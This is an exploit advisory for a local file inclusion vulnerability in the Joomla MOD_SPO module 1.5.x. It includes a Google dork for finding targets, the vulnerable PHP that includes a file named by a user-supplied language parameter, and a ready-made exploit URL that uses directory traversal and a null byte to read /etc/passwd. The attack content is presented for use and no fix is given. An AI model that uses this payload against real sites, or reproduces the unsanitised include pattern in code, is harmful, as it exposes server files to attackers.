Joomla Spo component version 1.5.x suffers from a local file inclusion vulnerability.
25c8d0b40a04fe86d1450ca8540b84a986673d77f03b2b67461bcddc2e6cf756
# Exploit Title: LFI Joomla Component MOD_SPO
# Google Dork: inurl:MOD_SPO
# Date: 15/07/2011
# Author: Jbyte
# Software Link: http://extensions.joomla.org/extensions/style-a-design/accessibility/5974
# Version: 1.5.x
# Tested on: Ubuntu 11.04, Windows xp
This Component of joomla has LFI(Local File Inclusion) you may call files of the server.
Vulnerable Code:
$s_lang =& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Exploit
http://www.example.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se
Visited: http://jbyte-security.blogspot.com/